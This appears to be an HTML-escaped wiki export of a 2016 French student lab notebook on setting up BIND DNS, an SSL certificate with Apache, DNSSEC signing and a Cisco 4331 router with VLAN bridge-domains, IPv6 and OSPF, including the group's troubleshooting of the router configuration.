&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for local loopback interface&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.speedflash.space. root.speedflash.space (&lt;br /&gt;
                              2         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
        IN      NS      ns.speedflash.space.&lt;br /&gt;
ns      IN      A       193.48.57.165&lt;br /&gt;
www     IN      A       193.48.57.165&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous déclarons que notre DNS (ns) est à l'adresse 193.48.57.165, soit l'IP de notre VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, pour faire fonctionner le tout, on relance bind : &amp;lt;pre&amp;gt; service bind9 restart &amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Et à l'aide du fichier de log daemon.log, on peut confirmer que bind s'est lancé sans erreur :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;tail /var/log/daemon.log | grep named&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: command channel listening on ::1#953&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: journal file is out of date: removing journal file&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: loaded serial 3&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 0.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone speedflash.space/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 127.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 255.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone localhost/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: all zones loaded&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: running&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Securisation de site par SSL=====&lt;br /&gt;
Afin d'obtenir un certificat SSL par Gandi, nous avons besoin d'un CSR. Nous générons donc le CSR par la commande :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha1 -keyout serveur.key -out serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous fournissons ce CSR à Gandi, puis nous attendons d'avoir notre certificat. Une fois le certificat obtenu, on peut copier les bons fichiers dans SSL :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# cp certificat.crt /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
root@Flash:/etc/bind# cp serveur.key /etc/ssl/private/speedflash.space.key&lt;br /&gt;
root@Flash:/etc/bind# cp GandiStandardSSLCA.pem /etc/ssl/certs/GandiStandardSSLCA.pem&amp;lt;/pre&amp;gt;&lt;br /&gt;
GandiStandardSSLCA.pem est un certificat intermédiaire afin de certifier notre certificat.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous re-hashons toute la structure afin de prendre en compte notre certificat :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@Flash:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
Doing /etc/ssl/certs&lt;br /&gt;
speedflash.space.crt =&amp;gt; ac112f31.0&lt;br /&gt;
speedflash.space.crt =&amp;gt; a88e5e47.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 0cad7ee9.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 3a57595e.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; 816e77e4.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; de4674a3.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut modifier le fichier '''000-speedflash.space-ssl.conf''' afin d'associer APACHE et notre nom de serveur : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;#NameVirtualHost *:443&lt;br /&gt;
        &amp;lt;VirtualHost 193.48.57.165:443&amp;gt;&lt;br /&gt;
                ServerName www.speedflash.space&lt;br /&gt;
                ServerAlias speedflash.space&lt;br /&gt;
                DocumentRoot /var/www/www.speedflash.space/&lt;br /&gt;
                CustomLog /var/log/apache2/secure_acces.log combined&lt;br /&gt;
&lt;br /&gt;
                SSLEngine on&lt;br /&gt;
                SSLCertificateFile /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
                SSLCertificateKeyFile /etc/ssl/private/speedflash.space.key&lt;br /&gt;
                SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA.pem&lt;br /&gt;
                SSLVerifyClient None&lt;br /&gt;
        &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
        &amp;lt;Directory /var/www/www.speedflash.space&amp;gt;&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
ServerName &amp;quot;speedflash.space&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut modifier le fichier '''ports.conf''' du serveur Apache pour qu'il écoute le port 443 (SSL):&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;Listen 80 443&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#&amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
#       Listen 443&lt;br /&gt;
#&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#&amp;lt;IfModule mod_ssl.c&amp;gt;&lt;br /&gt;
#       Listen 443&lt;br /&gt;
        #NameVirtualHost *:443&lt;br /&gt;
#&amp;lt;/IfModule&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut activer le module SSL de Apache : &amp;lt;pre&amp;gt; a2modssl&amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc activer notre Apache avec notre certificat : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# a2ensite 000-speedflash.space-ssl.conf &lt;br /&gt;
Enabling site 000-speedflash.space-ssl.&lt;br /&gt;
root@Flash:/etc/bind# service apache2 reload&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous pouvons vérifier que le site est sécurisé en allant sur https://www.speedflash.space et en voyant le cadenas vert.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Securisation de DNS par DNSSEC=====&lt;br /&gt;
Il faut générer les clés .key et .private afin de pouvoir signer les zones et les enregistrements.&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
l'option -r /dev/urandom est ici pour accélérer la génération des clés &amp;lt;br /&amp;gt;&lt;br /&gt;
Nous incluons les clés dans le fichier de zone db.speedflash.space : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/speedflash.space.dnssec/speedflash.space-ksk.key&lt;br /&gt;
$include /etc/bind/speedflash.space.dnssec/speedflash.space-zsk.key&amp;lt;/pre&amp;gt;&lt;br /&gt;
On signe donc la zone : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind/speedflash.space.dnssec# dnssec-signzone -o speedflash.space -k speedflash.space-ksk ../db.speedflash.space speedflash.space-zsk&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.speedflash.space.signed&amp;lt;/pre&amp;gt;&lt;br /&gt;
On ajoute le DNSSEC à Gandi : &amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:Dns-gandi.png]]&amp;lt;br /&amp;gt;&lt;br /&gt;
On vérifie que notre DNS est bien sécurisé en essayant la commande : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# dig DNSKEY speedflash.space @localhost&lt;br /&gt;
&lt;br /&gt;
; &amp;lt;&amp;lt;&amp;gt;&amp;gt; DiG 9.9.5-9+deb8u8-Debian &amp;lt;&amp;lt;&amp;gt;&amp;gt; DNSKEY speedflash.space @localhost&lt;br /&gt;
;; global options: +cmd&lt;br /&gt;
;; Got answer:&lt;br /&gt;
;; -&amp;gt;&amp;gt;HEADER&amp;lt;;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1&lt;br /&gt;
&lt;br /&gt;
;; OPT PSEUDOSECTION:&lt;br /&gt;
; EDNS: version: 0, flags:; udp: 4096&lt;br /&gt;
;; QUESTION SECTION:&lt;br /&gt;
;speedflash.space.        IN    DNSKEY&lt;br /&gt;
&lt;br /&gt;
;; ANSWER SECTION:&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    257 3 5 AwEAAaJcjim9pdD8U6InsiCNFzJthDwsiwGgPylxRp5nDuoaGrcDp1LU psBv0iY0VUqzcC+uRhTTfjl6P3yuPsnZYefVlSEeRpn9QR33Hioadbhc aFSuYnfwS/L/R6Kwt2XFz5V/fI/j+M2AtGxhBFgVKtmjvnwEr2VfdkFl d9AZJQu09ajWCJIKeL2dRE5bPbXwkDilgkQkBZUVWtXN7qwnrFnlszpb gSdRKosfhScAUmTerxOV6WybzOYb+9D0r8QrDoIhhCpf1/gczAUzHPWd hb0rxIGHk6seMp1qTotZE3SgxrCwm7H6z4pcXeMfbdNzkrIgcJmum9i0 zsLzlghkAPM=&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    256 3 5 AwEAAcHrx5vtsGzY7LF32x3HRIXRwOBm3WZM02NHY4s0uB2djn6tV52B ss78iXC4O5hdpJ0uOxS0/MNCYNJkIXnWsvAHc6lbdWfQ8Jvnj/aBMz94 agXbxXkseqjlIcF1huspBAi9lcY5hsy59MDek5iNlduy8HK6AVItqeQi HviShcq3&amp;lt;/pre&amp;gt;&lt;br /&gt;
On remarque bien la présence de DNSKEY qui nous assure que notre DNS est sécurisé.&amp;lt;br /&amp;gt;&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35258</id>
		<title>Cahier 2016 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35258"/>
				<updated>2016-11-18T12:39:51Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Securisation de DNS par DNSSEC */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Cahier des charges ==&lt;br /&gt;
=== Présentation du travail ===&lt;br /&gt;
&lt;br /&gt;
==== Répartition du travail ====&lt;br /&gt;
&lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 1 (03/10)&lt;br /&gt;
 | Recherche sur le routeur 4331. Installation de la machine virtuelle, définition de l'architecture réseau. &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 2 (10/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |- &lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 3 (13/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 4 (24/10)&lt;br /&gt;
 | Test de la configuration locale&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 5 (07/11)&lt;br /&gt;
 | Configuration OSPF - Configuration locale IPv6 - Configuration RIP - Configuration VRRP - Cassage de clé WEP&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 6 (17/11 - additionnel)&lt;br /&gt;
 | Protocole HSRP - Cassage de clé WPA - Configuration DNS - Securisation de site par SSL - Securisation de DNS par DNSSEC - LVM/RAID5&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 7 (28/11)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 8 (12/12)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 1ère semaine ====&lt;br /&gt;
&lt;br /&gt;
Pour cette première séance nous avons d'abord installé la machine virtuelle Xen grâce à la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=Flash --ip=193.48.57.165 --netmask=255.255.255.240 gateway=193.48.57.171 &lt;br /&gt;
--dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --passwd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous obtenons ce résultat:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Installation Summary&lt;br /&gt;
---------------------&lt;br /&gt;
Hostname        :  Flash&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:49:8F:E5&lt;br /&gt;
IP Address(es)  :  193.48.57.165 &lt;br /&gt;
RSA Fingerprint :  5c:89:1c:49:cf:d1:a0:a3:9b:ff:0c:d1:f7:33:82:db&lt;br /&gt;
Root Password   :  N/A&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Travail réalisé la 2e semaine (2 séances) ====&lt;br /&gt;
Durant cette semaine, nous avons réalisés la configuration locale du routeur (configuration des VLANs). &amp;lt;br /&amp;gt;&lt;br /&gt;
Comme le 4331 est une nouvelle génération de routeur encore non utilisée en TP de PRA, nous devons apprendre comment l'utiliser.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration générale=====&lt;br /&gt;
Communication: '''Série 9800 Bauds 8 bits sans parité sans contrôle de flux'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Lors de sa première mise en route, nous devons effectuer sa configuration générale :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; hostname cisco config hostname&lt;br /&gt;
 enable secret reverse &amp;lt;/pre&amp;gt;&lt;br /&gt;
Puis ensuite, nous pouvons passer à la configuration des VALNs.&lt;br /&gt;
=====Configuration des VLANs =====&lt;br /&gt;
Nous avons 12 VLANs à configurer :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 11 VLANs (2-11) : VLAN correspondant aux différents groupes.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (12) : VLAN des Machines virtuelles. Permet la communication entre Cordouan et les Commutateurs&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (13) : VLAN d'interconnexion. Permet la communication entre le routeur local et le routeur de l'école&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
Sur l'interface physique du 4331, il y a 3 interfaces:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/0 : disponible en cuivre et en fibre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/1: disponible en cuivre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/2: disponible en fibre&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons connecter notre routeur aux 2 commutateurs 6006 prévus dans l'architecture du TP. Pour cela, il faut que les 2 commutateurs aient les mêmes informations. Pour cela, nous devons créer des '''bridge-domain'''. Des bridge-domain permettent de rassembler 2 sous interfaces de 2 interfaces différentes pour qu'elles aient la même IP. L'interface principale n'aura pas d'adresse IP, les sous interfaces non plus, l'adresse IP sera placé sur le bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Exemple: '''VLAN2 : Gi 0/0/0.2 et Gi 0/0/1.2 seront dans le même bridge-domain 2'''&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les 4331 étant une nouvelle génération de routeur encore non testée à l'école, il fallait apprendre à s'en servir.&amp;lt;br /&amp;gt;&lt;br /&gt;
La plupart des commandes CISCO de base restent inchangées. Cependant, la création des sous interfaces a changée. Avant, nous devions créer des interfaces comme suit:&lt;br /&gt;
&amp;lt;pre&amp;gt; interface GigabitEthernet 0/0/0.X &amp;lt;/pre&amp;gt;&lt;br /&gt;
Avec le nouvel IOS (IOS ISR), nous ne pouvons pas créer des sous interfaces comme ci-dessus dans le but de les mettre dans un bridge.&lt;br /&gt;
Nous devons passer par une nouvelle commande qui s'appelle '''service instance''' :&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi 0/0/0&lt;br /&gt;
 service instance &amp;lt;n°VLAN&amp;gt; ethernet &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous avons la sous interface numéro 2 de l'interface principale 0/0/0.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons alors créer nous sous interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
&lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
    encapsulation dot1q 3&lt;br /&gt;
    bridge-domain 3&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nos sous interfaces sont crées et sont placés dans les différents bridge domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Configuration des bridge-domain=====&lt;br /&gt;
Afin d'allouer des IP aux différents bridge domain, il faut prévenir le routeur que nous utilisons des bridge-domain:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge irb &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, nous devons préciser quel protocole nous devons utiliser et si les adresses IP des bridge domain seront des adresses routées :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge 2 protocol ieee&lt;br /&gt;
 bridge 2 route ip&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, nous pouvons allouer des IP aux différents bridge domain :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;int BDI2&lt;br /&gt;
  ip address 10.60.2.1 255.255.255.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et nous répétons ces opérations pour tous les bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Afin de tester si notre configuration locale est correcte, nous devons racker notre routeur, le connecter à un des 6006, puis connecter le 6006 à Cordouan (groupe BONDING). Ainsi, nous pourrons voir si nous pouvons ping notre routeur depuis notre VM.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 3e semaine====&lt;br /&gt;
=====Test 1=====&lt;br /&gt;
Cette semaine, nous avons testés la configuration locale de notre routeur. Nous avons donc tentés de ping le routeur depuis notre VM. &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour tester, nous avons besoin d'un port disponible sur CORDOUAN qui est dans le bridge IMA5sc.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après des essais laborieux, nous décidons donc de regarder les adresses MAC des ports afin de les rassembler. Si 4 ports ont le même radical MAC, c'est qu'ils font partis d'un groupe de 4. Nous avons donc choisis '''eth4'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, il fallait trouver le port physique correspondant a eth4. '''Grâce au fichier /etc/udev/rules.d/70-persistence-net.rules''', on peut voir l'association du port physique à l'interface. Voici l'extrait qui nous intéresse: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;# PCI device 0x14e4:0x1657 (tg3)&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:40&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth4&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:41&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth5&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:42&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth6&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:43&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth7&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
On voit bien que eth4 est dans un groupe de 4 ports, ce qui restreint nos choix. Ensuite, on sait que c'est le plus petit des 4 interfaces. Logiquement, ce sera le 1er du groupe.&amp;lt;br /&amp;gt;&lt;br /&gt;
On connecte donc ce port au commutateur sur un port qui appartient au VLAN des VM. On connecte ensuite notre routeur au commutateur via un port trunk.&amp;lt;br /&amp;gt;&lt;br /&gt;
'''Premier essai: FAIL'''&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Test 2=====&lt;br /&gt;
Et là, c'est le drame ... On ne ping rien ...&amp;lt;br /&amp;gt;&lt;br /&gt;
On se demande donc d'où cela peut venir.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Première cause possible : La configuration de CORDOUAN======&lt;br /&gt;
Peut-être que c'est CORDOUAN qui est mal configuré. On se place donc sur CORDOUAN, et grâce à la commande '''cdpr''' (Cisco Discovery Protocol Reporter), on peut demander au serveur de chercher ses voisins et d'avoir la configuration de la liaison avec ce voisin. Voici le résultat de cette commande:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cdpr -d eth4&lt;br /&gt;
cdpr - Cisco Discovery Protocol Reporter&lt;br /&gt;
Version 2.4&lt;br /&gt;
Copyright (c) 2002-2010 - MonkeyMental.com&lt;br /&gt;
&lt;br /&gt;
Using Device: eth4&lt;br /&gt;
Warning opening device (eth4: no IPv4 address assigned)&lt;br /&gt;
Waiting for CDP advertisement:&lt;br /&gt;
(default config is to transmit CDP packets every 60 seconds)&lt;br /&gt;
Device ID&lt;br /&gt;
  value:  Switch_E306&lt;br /&gt;
Addresses&lt;br /&gt;
Port ID&lt;br /&gt;
  value:  GigabitEthernet4/13&amp;lt;/pre&amp;gt;&lt;br /&gt;
On voit bien que CORDOUAN détecte qu'il a une liaison avec le switch qui se trouve en E306 et qu'il est connecté via le port Gi4/13.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Deuxième cause possible: Le commutateur======&lt;br /&gt;
Peut-être donc que c'est le commutateur qui est mal configuré. On se place donc sur le commutateur, et toujours grâce à la commande '''cdpr''', on peut demander au commutateur de trouver ses voisins. Le résultat de cette commande est la suivante: Le commutateur découvre bien notre routeur (cisco), et sait qu'il est connecté sur le port 4/47 (port trunk).&lt;br /&gt;
======Dernière cause possible:Le routeur======&lt;br /&gt;
On se dit donc que le problème vient du routeur...&amp;lt;br /&amp;gt;&lt;br /&gt;
On regarde donc la configuration du routeur, et Mr REDON nous demande pourquoi on n'a pas créé de VLAN. Les VLAN sont traduits par les service instance dans le nouvel IOS, mais peut-être que nous devons encore définir que les paquets venant/sortant de l'interface générale doivent être encapsulé/décapsulé en DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après quelques recherches, une première solution a été de préciser sur l'interface des bridge-domain que les paquets étaient encapsulés en DOT1Q. Solution '''peu logique''' vu que l'encapsulation est déjà faite dans les service instance.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après encore quelques recherches, une solution plausible est que '''le routeur ne sait pas qu'il faut dé-encapsuler les paquets venant d'un VLAN'''. Théoriquement, il n'enlèverait pas le tag associé à l'encapsulation DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une commande cisco à associer à TOUTES les interfaces service instance permet de préciser qu'il faut supprimer le tag associé à l'encapsulation:&lt;br /&gt;
&amp;lt;pre&amp;gt;rewrite ingress tag pop 1 symmetric&amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois cette commande appliquée à tous les services, nous pouvons effectuer un test préalable : '''Nous connectons un eeePC au commutateur via un port associé au VLAN des VM. L'eeePC serait muni d'une IP dans le réseau des VM.'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Résultat '''OK'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc tenter de ping le routeur depuis la machine virtuelle :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ping 193.48.57.171&lt;br /&gt;
PING 193.48.57.171 (193.48.57.171) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=1 ttl=255 time=0.360 ms&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=2 ttl=255 time=0.271 ms&lt;br /&gt;
^C&lt;br /&gt;
--- 193.48.57.171 ping statistics ---&lt;br /&gt;
2 packets transmitted, 2 received, 0% packet loss, time 999ms&lt;br /&gt;
rtt min/avg/max/mdev = 0.271/0.315/0.360/0.047 ms&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre configuration locale est donc maintenant achevée. Nous pouvons passer à la configuration de l'interconnexion ipv4 et ipv6 de l'école.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 4e semaine====&lt;br /&gt;
=====Configuration IPv6=====&lt;br /&gt;
Nous avons donc pu commencer la configuration IPv6 de notre routeur.&amp;lt;br /&amp;gt;&lt;br /&gt;
Chaque bridge-domain aura son adresse IP dans le réseau IPv6 de l'école, avec un préfixe débutant à 2001:660:4401:60b0::/64.&amp;lt;br /&amp;gt;&lt;br /&gt;
La configuration est la suivante, pour chaque BDI:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco(config)#int BDI6                                                          &lt;br /&gt;
cisco(config-if)#ipv6 address 2001:660:4401:60b4::/64 eui-64                    &lt;br /&gt;
cisco(config-if)#ipv6 nd prefix 2001:660:4401:60b4::/64 1000 900                &lt;br /&gt;
cisco(config-if)#ipv6 nd router-preference high                                 &lt;br /&gt;
cisco(config-if)#ipv6 enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration OSPF (IPv4)=====&lt;br /&gt;
Dès notre arrivée, Mr.REDON nous a dit que, pour booster le TP, il avait effectué lui-même la configuration OSPF de notre routeur. La voici:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;router ospf 1&lt;br /&gt;
 router-id 10.60.2.1&lt;br /&gt;
 summary-address 10.60.0.0 255.255.0.0&lt;br /&gt;
 summary-address 193.48.57.160 255.255.255.240&lt;br /&gt;
 redistribute connected metric 30 subnets&lt;br /&gt;
 network 192.168.222.0 0.0.0.7 area 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration RIP (IPv6)=====&lt;br /&gt;
